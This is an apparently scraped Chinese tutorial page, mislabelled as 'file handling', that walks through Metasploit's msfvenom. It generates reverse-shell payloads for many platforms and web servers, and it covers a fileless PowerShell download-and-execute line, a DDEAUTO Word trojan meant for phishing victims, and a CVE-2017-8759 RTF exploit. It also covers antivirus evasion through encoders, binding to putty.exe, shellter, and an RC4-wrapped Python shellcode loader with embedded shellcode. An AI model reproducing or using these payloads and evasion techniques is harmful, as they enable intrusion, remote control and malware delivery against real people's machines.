第四篇:文件处理

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了第四篇:文件处理相关的知识,希望对你有一定的参考价值。

一、 msfvenom简介

  msfvenommsf payloadmsf encode的结合体,于201568日取代了msf payloadmsf encode。在此之后,metasploit-framework下面的msf payload(载荷生成器),msf encoder(编码器),msfcli(监听接口)都不在支持。

二、msf venom参数

-p,  -payload <payload>指定需要使用的payload(攻击载荷)。也可以使用自定义的payload,几乎是支持全平台的
-l, -list [module_type] 列出指定模块的所有可用资源。模块类型包括:payloads,encoders,nops,all
-n,-nopsled <length>为payload预先指定一个NOP滑动长度
-f, -format <format>指定输出格式(使用--help-formats来获取msf支持的输出格式列表)
-e, -encoder[encoder]指定需要使用的encoder(编码器),如果即没有-e选择也没用-b选项,则输出raw payload-a, -arch <architecture> 指定payload的目标架构,例如x86|x64|x86_64-plaform <platform>指定payload的目标平台
-s, -space <length>设定有效攻击荷载的最大长度,就是文件大小
-b, -bad-chars <list>设定规避字符集,指定需要过滤的坏字符例如:不使用\'x0f\'\'\\x00\';-i, -iterations <count>指定payload的编码次数
-c, -add-code <path> 指定一个自定义的可执行文件为模板,并将payload嵌入其中
-k, -keep保护模板程序的动作,注入的payload作为一个新的进程运行
-payload-options列举payload的标准选项
-o, -out <path> 指定创建好的payload的存放位置
-v, -var-name <name>指定一个自定义的变量,以确定输出格式
-shellest 最小化生成payload
-h, -help查看帮助选项
-help-formats查看msf支持的输出格式列表

查看所有payload

root@kali:~/桌面# msfvenom --list payloads

 查看所有编码器

root@kali:~/桌面# msfvenom --list encoders

# 评级最高的两个encoder为cmd/powershell_base64和x86/shikata_ga_nai,其中x86/shikata_ga_nai也是免杀中使用频率最高的一个编码器

 查看windows/meterpreter/reverse_tcp支持什么平台、哪些选项,可以使用

root@kali:~/桌面# msfvenom -p windows/meterpreter/reverse_tcp --list-options

三、监听参数

防止假session
在实战中,经常会遇到假session或者刚连接就断开的情况,这里补充一些监听参数,防止假死与假session。
msf exploit(multi/handler) > set ExitOnSession false   
//可以在接收到seesion后继续监听端口,保持侦听。
防止session意外退出
msf5 exploit(multi/handler) > set SessionCommunicationTimeout 0  
//默认情况下,如果一个会话将在5分钟(300秒)没有任何活动,那么它会被杀死,为防止此情况可将此项修改为0
msf5 exploit(multi/handler) > set SessionExpirationTimeout 0 
//默认情况下,一个星期(604800秒)后,会话将被强制关闭,修改为0可永久不会被关闭

四、handler后台持续监听

use exploit/multi/handler
set PAYLOAD <Payload name>
set LHOST 192.168.8.124
set LPORT 1122
set ExitOnSession false
exploit -j -z


msf exploit(multi/handler) > exploit -j -z
使用exploit -j -z可在后台持续监听,-j为后台任务,-z为持续监听,使用Jobs命令查看和管理后台任务。jobs -K可结束所有任务。
还有种比较快捷的建立监听的方式,在msf下直接执行:
msf5 > handler -H 192.168.244.128 -P 1122 -p windows/meterpreter/reverse_tcp

 

五、payload的可持续化

一般来说使用msfvenom生成的payload会单独开启一个进程,这种进程很容易被发现和关闭,在后期想做持久化的时候只能再使用migrate进行。 其实在生成payload时可直接使用如下命令,生成的payload会直接注入到指定进程中。

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.244.128 LPORT=1122 -e x86/shikata_ga_nai -b "\\x00" -i 5 -a x86 --platform win PrependMigrate=true PrependMigrateProc=svchost.exe -f exe -o shell.exe

生成的shell程序执行后会启动两个进程shell.exe和svchost.exe,关闭其中一个不会影响会话状态。 在上面的生成payload参数中: (1)PrependMigrate=true PrependMigrateProc=svchost.exe 使这个程序默认会迁移到svchost.exe进程,自己测试的时候不建议到这个进程而是其他的持久进程。 (2)使用-p指定使用的攻击载荷模块,使用-e指定使用x86/shikata_ga_nai编码器,使用-f选项告诉MSF编码器输出格式为exe,-o选项指定输出的文件名为payload.exe,保存在根目录下。

 把生成的shell.exe(此文件不免杀) 复制到windows 2003靶机中双击运行

 

 

六、各平台payload生成

6.1 Linux

(1)设置监听

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > show options

msf5 exploit(multi/handler) > set lhost 192.168.244.128
lhost => 192.168.244.128
msf5 exploit(multi/handler) > set lport 1123
lport => 1123
msf5 exploit(multi/handler) > run

(2)生成Linux payload

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.244.128 LPORT=1123 -f elf > shell.elf

 

(3)执行shell.elf

root@kali:~# ls -larth shell.elf 
-rw-r--r-- 1 root root 250 6月  13 20:47 shell.elf
root@kali:~# chmod +x shell.elf 
root@kali:~# ./shell.elf

 (4) 查看sessions

6.2 Windows

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.244.128 LPORT=1122 -f exe > shell.exe

6.3 Mac

msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho

6.4 android

msfvenom -a dalvik -p android/meterpreter/reverse_tcp LHOST=192.168.244.128 LPORT=1122 -f raw > shell.apk
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.244.128 LPORT=1122 R > test.apk

七、生成脚本payload

7.1 powershell

msfvenom -a x86 --platform Windows -p windows/powershell_reverse_tcp LHOST=192.168.244.128 LPORT=1122 -e cmd/powershell_base64 -i 3 -f raw -o shell.ps1

7.2 nc正向连接

msfvenom -p windows/shell_hidden_bind_tcp LHOST=192.168.244.128 LPORT=1122  -f exe> 1.exe

7.3 nc反向连接,监听

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.244.128 LPORT=1122  -f exe> 1.exe

7.4 php

kali监听会话、把shell.php上传至目标网站访问就可以建立会话了

(1)建立监听

msf5 exploit(multi/handler) >  use exploit/multi/handler
msf5 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.244.128
lhost => 192.168.244.128
msf5 exploit(multi/handler) > set lport 1124
lport => 1124
msf5 exploit(multi/handler) > run

(2)生成payload

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.244.128 LPORT=1124 -f raw > shell.php

(3)把shell.php上传至目标网站

 

 (4)浏览器访问shell.php

 

 (5)查看建立的session

7.5 ASP

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp

7.6 JSP

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp

7.7 WAR

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war

7.8 powershell配置msf无文件攻击

(1)生成ps脚本、把生成的脚本放到web站点下

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.244.128 LPORT=1125 -f psh-reflection >x.ps1

(2)设置监听

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.244.128 
set lport 1125
run

(3)客户端运行

powershell IEX (New-Object Net.WebClient).DownloadString(\'http://192.168.244.129/x.ps1\')

(4)查看会话

 7.9 powershell配置word伪装木马

监听、生成payload操作和7.8操作一致

(1)新建一个word文档——插入——文档部件——域

 

 

 

 

 

 

 

 

DDEAUTO C:\\\\windows\\\\system32\\\\cmd.exe "/k powershell IEX (New-Object Net.WebClient).DownloadString(\'http://192.168.244.129/x.ps1\') "

 

 

 

(3)通过钓鱼、社工等方式让其他人打开此word文档

 

 

7.10 msf宏钓鱼

git clone https://github.com/bhdresh/CVE-2017-8759.git
cd CVE-2017-8759/
python cve-2017-8759_toolkit.py -M gen -w Invoice.rtf -u http://192.168.244.128/logo.txt
# 生成如下图所示的文件

 

 生成payload

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.244.128 LPORT=1133 -f exe > /root/shell.exe
python cve-2017-8759_toolkit.py -M exp -e http://192.168.244.128/shell.exe -l shell.exe

开启监听

msf5 >  use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.244.128
lhost => 192.168.244.128
msf5 exploit(multi/handler) > set lport 1133
lport => 1133
msf5 exploit(multi/handler) > run

把Invoice.rtf 上传到Windows 7

 

 

 

 

 

 八、ngrok穿透内网

 http://www.ngrok.cc/

 

 

 

 

 

 

 

 

 

 

unzip linux_amd64.zip
cd linux_amd64
./sunny clientid xxxxid

 

 生成payload

root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp lhost=free.idcfengye.com lport=10929 -f exe > a.exe

开启监听

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 127.0.0.1
lhost => 127.0.0.1
msf5 exploit(multi/handler) > set lport 10929
lport => 10929
msf5 exploit(multi/handler) > run

 

 Windows 7执行木马

 

 查看session

 

 九、msf5-Evasion免杀模块

9.1 Defender免杀

msf5 > use windows/windows_defender_exe
msf5 evasion(windows/windows_defender_exe) > options
msf5 evasion(windows/windows_defender_exe) > set filename ev.exe
filename => ev.ext
msf5 evasion(windows/windows_defender_exe) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 evasion(windows/windows_defender_exe) > set lhost 192.168.244.128
lhost => 192.168.244.128
msf5 evasion(windows/windows_defender_exe) > set lport 1177
lport => 1177
msf5 evasion(windows/windows_defender_exe) > run

 设置监听

handler -H 192.168.244.128 -P 1177 -p windows/meterpreter/reverse_tcp

 

 

 目前已经不免杀

 

 

 

9.2 捆绑免杀 

可以在此站检测木马  https://www.virustotal.com/gui/home/upload

生成payload 捆绑putty.exe

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.244.128 LPORT=1122  -x putty.exe  -f exe -o payload3.exe

捆绑编码免杀

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.244.128 LPORT=1122 -e x86/shikata_ga_nai -x putty.exe  -i 15 -f exe -o payload4.exe

多重编码免杀

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp -e x86/call4_dword_xor -i 14 LHOST=192.168.244.128 LPORT=1122 -f raw | msfvenom -a x86 --platform windows -e x86/countdown -i 13 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -b "&" -i 4 -f raw | msfvenom -a x86 --platform windows -e cmd/powershell_base64 -i 10 -x putty.exe -k -f exe > shell.exe

十、shellter免杀

shellcode代码注入工具

https://www.shellterproject.com/download/

vim /etc/apt/sources.list
#中科大源
deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib 
deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
apt-get update


apt-get install shellter 

dpkg --add-architecture i386 && apt-get update && apt-get install wine32

启动shellter

root@kali:~# shellter

 

 

 

 开启监听

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.244.128
lhost => 192.168.244.128
msf5 exploit(multi/handler) > set lport 1155
lport => 1155
msf5 exploit(multi/handler) > run

把putty.exe复制到window7中运行(运行最新版本的360)

 

 查看建立的session

 用360动态杀毒时(不免杀)

 

十一、免杀python脚本

root@kali:~# msfvenom -p windows/x64/meterpreter/reverse_tcp LPORT=1155 LHOST=192.168.244.128 -e x86/shikata_ga_nai -i 17 -f py -o  /root/121.py

 修改生成的py文件(头部和尾部添加、如下所示)

from ctypes import *
import ctypes
import sys, os, hashlib, time, base64

def rc4(string, op=\'encode\', public_key=\'ddd\', expirytime=0):
    ckey_lenth = 4
    public_key = public_key and public_key or \'\'
    key = hashlib.md5(public_key).hexdigest()
    keya = hashlib.md5(key[0:16]).hexdigest()
    keyb = hashlib.md5(key[16:32]).hexdigest()
    keyc = ckey_lenth and (op == \'decode\' and string[0:ckey_lenth] or hashlib.md5(str(time.time())).hexdigest()[32 - ckey_lenth:32]) or \'\'
    cryptkey = keya + hashlib.md5(keya + keyc).hexdigest()
    key_lenth = len(cryptkey)  # 64
    string = op == \'decode\' and base64.b64decode(string[4:]) or \'0000000000\' + hashlib.md5(string + keyb).hexdigest()[0:16] + string
    string_lenth = len(string)
    result = \'\'
    box = list(range(256))
    randkey = []
    for i in xrange(255):
        randkey.append(ord(cryptkey[i % key_lenth]))
    for i in xrange(255):
        j = 0
        j = (j + box[i] + randkey[i]) % 256
        tmp = box[i]
        box[i] = box[j]
        box[j] = tmp
    for i in xrange(string_lenth):
        a = j = 0
        a = (a + 1) % 256
        j = (j + box[a]) % 256
        tmp = box[a]
        box[a] = box[j]
        box[j] = tmp
        result += chr(ord(string[i]) ^ (box[(box[a] + box[j]) % 256]))
    if op == \'decode\':
        if (result[0:10] == \'0000000000\' or int(result[0:10]) - int(time.time()) > 0) and result[10:26] == hashlib.md5(
                result[26:] + keyb).hexdigest()[0:16]:
            return result[26:]
        else:
            return None
    else:
        return keyc + base64.b64encode(result)


buf =  b""
buf += b"\\xb8\\x28\\xce\\x23\\x6c\\xdb\\xca\\xd9\\x74\\x24\\xf4\\x5a\\x31"
buf += b"\\xc9\\xb1\\xec\\x31\\x42\\x14\\x03\\x42\\x14\\x83\\xea\\xfc\\xca"
buf += b"\\x3b\\xf8\\xa6\\xb1\\x1e\\x60\\x6e\\x19\\x47\\xeb\\xab\\x55\\x27"
buf += b"\\x3d\\x7d\\x24\\x3d\\xbe\\x92\\xba\\x8f\\x9e\\x7a\\x41\\xaf\\x36"
buf += b"\\x61\\x6a\\x0b\\xa1\\x03\\xb3\\x5f\\xd3\\x48\\x35\\x26\\xa9\\x11"
buf += b"\\xa7\\x32\\x7d\\x80\\xe6\\xd1\\x66\\x9a\\x66\\xc4\\xce\\x49\\x58"
buf += b"\\x57\\x8b\\x00\\x8c\\x91\\xdf\\xd7\\xec\\xe0\\x5f\\x72\\x48\\xc8"
buf += b"\\xee\\xaf\\x99\\x62\\x57\\xf0\\x56\\x40\\x7e\\xc2\\xc2\\x8e\\x3b"
buf += b"\\xbe\\x0f\\x7d\\x5b\\x82\\xa3\\xd8\\x02\\xcf\\xf4\\xf7\\x15\\x32"
buf += b"\\xb8\\xbc\\x0a\\x03\\xb8\\x34\\x22\\x2f\\x21\\x58\\x83\\x6b\\x8f"
buf += b"\\xa0\\x32\\xda\\x92\\x9a\\x7a\\x0b\\xb8\\x42\\x82\\x09\\xe9\\x32"
buf += b"\\x94\\x17\\xcb\\x5a\\xea\\x8e\\xdb\\xda\\x9f\\x86\\x17\\x6b\\xc8"
buf += b"\\x95\\xf1\\xbc\\x1d\\x1c\\xbc\\x57\\x10\\xad\\x85\\x4a\\x35\\x3f"
buf += b"\\xf8\\x01\\xc0\\xa4\\x35\\x5c\\xd8\\xb7\\xf5\\x2c\\xfd\\x2f\\xd8"
buf += b"\\x57\\x21\\xe3\\x0d\\x0c\\x57\\xa1\\x0f\\xcb\\xfe\\x18\\x5a\\x7f"
buf += b"\\xa5\\xa6\\xc6\\x2e\\x61\\xad\\xc3\\x4c\\xb6\\xa1\\x03\\x47\\x83"
buf += b"\\x03\\xd2\\x09\\xff\\x15\\xd3\\x38\\x12\\x40\\x94\\xdd\\xae\\x5a"
buf += b"\\x32\\x52\\x6c\\xa2\\xa8\\x18\\xdd\\xd9\\x6b\\x3e\\x84\\x15\\x8f"
buf += b"\\xe4\\x85\\x9e\\x3d\\xca\\xee\\xa7\\xff\\x44\\x18\\xf9\\xcd\\x80"
buf += b"\\x9a\\xc5\\x0a\\x25\\xcc\\xf1\\xcd\\x1f\\xf6\\xf4\\x45\\x16\\xbc"
buf += b"\\x8c\\x96\\xdc\\x71\\x9b\\x35\\xaf\\xaf\\xa0\\xd3\\x57\\x0a\\x2e"
buf += b"\\xb1\\x63\\xa6\\xfa\\xa4\\x11\\xa1\\x8d\\x87\\xc9\\xeb\\x0e\\x85"
buf += b"\\xa9\\x6d\\x9c\\x4b\\x60\\xd0\\xcb\\xf6\\x2b\\xa9\\xcf\\x36\\xef"
buf += b"\\xa2\\x5f\\x98\\xa1\\x38\\xfd\\x86\\x74\\xab\\xd2\\x8b\\x4b\\xfd"
buf += b"\\xd0\\xd7\\x7b\\x64\\x8b\\x34\\x3a\\xad\\x19\\xce\\xba\\x88\\x33"
buf += b"\\x92\\x59\\xb4\\xea\\x80\\x5a\\x6f\\x39\\xbb\\xe4\\xa9\\xba\\xd4"
buf += b"\\x3b\\x74\\xa0\\xc0\\x84\\xc8\\xb4\\xf0\\xcd\\x2e\\x30\\x05\\x96"
buf += b"\\x87\\xd3\\x04\\xf6\\x69\\x4b\\xd0\\x88\\x00\\x83\\x4a\\x3b\\x1e"
buf += b"\\x50\\x68\\x47\\x9f\\x12\\x81\\x84\\x49\\x18\\x88\\x78\\x34\\x28"
buf += b"\\x13\\x49\\x37\\xd0\\xc2\\x6f\\x78\\x88\\xc5\\x30\\xbd\\x92\\x90"
buf += b"\\x6d\\x96\\xa7\\xbd\\xec\\xef\\x91\\x1c\\x6b\\xb5\\xca\\x24\\x24"
buf += b"\\x41\\x2a\\xce\\x4f\\x7f\\x5e\\x82\\xc8\\xbc\\x8a\\x1c\\xd8\\x0a"
buf += b"\\xe3\\xcf\\xb6\\x3e\\x12\\x72\\x4e\\x05\\xd0\\x40\\x59\\x82\\x05"
buf += b"\\x32\\xbb\\x1a\\xe4\\x0a\\x62\\x9a\\xff\\x89\\xc6\\xce\\xaa\\xeb"
buf += b"\\x04\\xae\\x95\\x65\\x19\\x3b\\x79\\x1e\\xe7\\xe7\\x06\\x8e\\xa7"
buf += b"\\xa2\\x98\\x6c\\x6c\\xb7\\x01\\x66\\x13\\x09\\x60\\x78\\x39\\x3f"
buf += b"\\x49\\x47\\x7c\\x55\\xba\\x57\\xd2\\x93\\xb5\\xcc\\x6d\\x23\\xe2"
buf += b"\\xd6\\xcb\\xd5\\x13\\x46\\x60\\x5b\\xaf\\x49\\x7a\\x00\\xdc\\x78"
buf += b"\\x58\\x6c\\x46\\x79\\xd8\\x3e\\xdb\\x3f\\xd7\\x3f\\x08\\xf2\\x8b"
buf += b"\\x2d\\x22\\x07\\x03\\x7d\\x88\\xfe\\xc6\\xef\\xe4\\x95\\x4a\\x56"
buf += b"\\xa0\\x81\\xf5\\x69\\xca\\x38\\x00\\x3f\\xa0\\x86\\x9a\\xca\\xd8"
buf += b"\\x5f\\xe5\\x38\\x93\\xb0\\x1b\\x81\\x32\\x15\\xbc\\xba\\xc3\\x9d"
buf += b"\\xa7\\x85\\x9c\\x5b\\x93\\x42\\x63\\xc2\\xb6\\x4b\\x72\\xb7\\x7e"
buf += b"\\xd8\\xb9\\x14\\xe7\\x5a\\x34\\x5a\\xee\\xa9\\x8b\\x3d\\x13\\x84"
buf += b"\\x18\\xf1\\xb3\\xda\\x05\\x27\\x95\\xb2\\x7f\\xda\\x67\\xf7\\x68"
buf += b"\\x47\\x5c\\x0a\\xe6\\x95\\x0f\\xbe\\x39\\xea\\xe5\\xf6\\x09\\x2a"
buf += b"\\xe8\\x0c\\x93\\xb0\\xf3\\x79\\x03\\xd5\\x37\\xf1\\xcb\\xae\\x35"
buf += b"\\x4c\\xd9\\x3a\\xa7\\x74\\xf2\\x49\\xdb\\x25\\x30\\x08\\xc2\\x26"
buf += b"\\x72\\x8b\\x40\\x30\\xd9\\x93\\x5c\\xee\\xbd\\xe1\\xd1\\x2d\\x03"
buf += b"\\x05\\x16\\x11\\x74\\x2d\\xfe\\x24\\x84\\x27\\x0f\\x8e\\x0d\\xd9"
buf += b"\\x26\\x63\\x0c\\x45\\x86\\xa3\\x59\\x9d\\x3f\\xbf\\x53\\x21\\x67"
buf += b"\\xbf\\xad\\x77\\xb0\\x38\\xf2\\x05\\x6c\\x51\\xcd\\xc7\\xfd\\x11"
buf += b"\\xee\\xd6\\x07\\x01\\x82\\xf5\\x0c\\xb9\\xa8\\x40\\x0a\\xb6\\x17"
buf += b"\\x41\\xc9\\xa1\\x67\\x5a\\x7b\\x21\\x15\\x3f\\x5d\\xe1\\xe3\\x61"
buf += b"\\x22\\xb5\\xbb\\xc9\\x91\\x8b\\xd7\\x62\\x34\\xf3\\x56\\x74\\x15"
buf += b"\\xae\\xbf\\xc3\\xf3\\x53\\x0b\\xb3\\xef\\xc1\\x59\\x95\\x2b\\x54"
buf += b"\\x8c\\x50\\x90\\xab\\xc8\\xa3\\x1b\\xaa\\xda\\xdd\\xd6\\x0e\\xd6"
buf += b"\\xbd\\x6d\\x7b\\x76\\x88\\x04\\x42\\x50\\xf0\\x9a\\xe1\\x72\\x79"
buf += b"\\xdb\\x8b\\x3b\\xb4\\x6b\\x8e\\xd2\\x58\\xa4\\x1b\\x81\\xad\\x48"
buf += b"\\x17\\xaa\\x9c\\xe5\\x1f\\xc3\\x10\\xd8\\x82\\x42\\x7a\\xb0\\x3b"
buf += b"\\x29\\xb7\\xa9\\xf1\\xee\\x40\\x42\\xcc\\xa8\\x8b\\x84\\xce\\x7c"
buf += b"\\xd7\\x0d\\x34\\x08\\xb6\\xe5\\xaf\\x27\\x84\\x5c\\x28\\x15\\xe1"
buf += b"\\x46\\x7c\\xb0\\xa8\\x7a\\xc3\\x77\\x12\\x7a\\xda\\xb3\\xc8\\x5f"
buf += b"\\x29\\x08\\x82\\x05\\xf9\\xe4\\xb3\\xcd\\xf6\\x41\\x5f\\x55\\x9b"
buf += b"\\x9a\\x5d\\x6a\\x69\\x1b\\x51\\x0c\\x77\\xf5\\xc1\\x79\\x1b\\x1e"
buf += b"\\xd8\\xd3\\x24\\x41\\xee\\x4f\\x1c\\x5c\\xef\\x77\\xf2\\x68\\x71"
buf += b"\\x49\\x51\\xfc\\x27\\x5e\\x55\\x35\\xdf\\x4f\\x9e\\x8d\\xe5\\xf9"
buf += b"\\x3e\\x7d\\xc7\\x58\\x99\\xc0\\xe2\\xda\\xe7\\xad\\x85\\xf1\\xb3"
buf += b"\\x34\\xc9\\xc4\\x48\\x26\\x4f\\x9e\\x66\\xf1\\xcb\\x68\\x82\\xf7"
buf += b"\\xe6\\x96\\x43\\x9a\\x0c\\xe4\\x0e\\x36\\x81\\xde\\x7d\\xa9\\x54"
buf += b"\\xce\\xa2\\xf5\\xfc\\xcc\\x89\\x0d\\x01\\x5c\\xf2\\xbe\\x99\\xc2"
buf += b"\\xe3\\x68\\x12\\x3d\\xb0\\x76\\xfe\\xd6\\x1c\\xd1\\x57\\xa7\\xa8"
buf += b"\\xa2\\xfc\\x4a\\x65\\x75\\xa2\\xd1\\xa4\\xbe\\xd9\\x98\\x03\\x37"
buf += b"\\xae\\xaf\\x82\\x2a\\x55\\x57\\xe9\\x70\\x9b\\x3b\\x07\\x44\\x6b"
buf += b"\\x47\\xb7\\x42\\x41\\x10\\x01\\x25"



buf=rc4(buf,\'encode\',\'6666666666666\')

# libc = CDLL(\'libc.so.6\')
PROT_READ = 1
PROT_WRITE = 2
PROT_EXEC = 4
def executable_code(buffer):
    buf = c_char_p(buffer)
    size = len(buffer)
    addr = libc.valloc(size)
    addr = c_void_p(addr)
    if 0 == addr:
        raise Exception("Failed to allocate memory")
    memmove(addr, buf, size)
    if 0 != libc.mprotect(addr, len(buffer), PROT_READ | PROT_WRITE | PROT_EXEC):
        raise Exception("Failed to set protection on buffer")
    return addr

VirtualAlloc = ctypes.windll.kernel32.VirtualAlloc
VirtualProtect = ctypes.windll.kernel32.VirtualProtect
shellcode = bytearray(rc4(buf, \'decode\', \'6666666666666\'))
whnd = ctypes.windll.kernel32.GetConsoleWindow()
if whnd != 0:
    if 666 == 666:
        ctypes.windll.user32.ShowWindow(whnd, 0)
        ctypes.windll.kernel32.CloseHandle(whnd)
memorywithshell = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
                                                      ctypes.c_int(len(shellcode)),
                                                      ctypes.c_int(0x3000),
                                                      ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
old = ctypes.c_long(1)
VirtualProtect(memorywithshell, ctypes.c_int(len(shellcode)), 0x40, ctypes.byref(old))
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(memorywithshell),
                                     buf,
                                     ctypes.c_int(len(shellcode)))
shell = cast(memorywithshell, CFUNCTYPE(c_void_p))
shell()
121.py

安装pyinstaller 打包exe

pip install pywin32
pip install pyinstaller

打包exe并执行此exe文件

C:\\Python27>pyinstaller -F 121.py

 

 

 

十二、venom秒杀payload以上是关于第四篇:文件处理的主要内容,如果未能解决你的问题,请参考以下文章

第四篇:文件处理

ABP 异常处理 第四篇

Python开发第四篇:Python基础之文件处理

Python成长之路第四篇模块儿

Linux从青铜到王者第四篇:Linux开发项目之编译器和调试器

Django 第四篇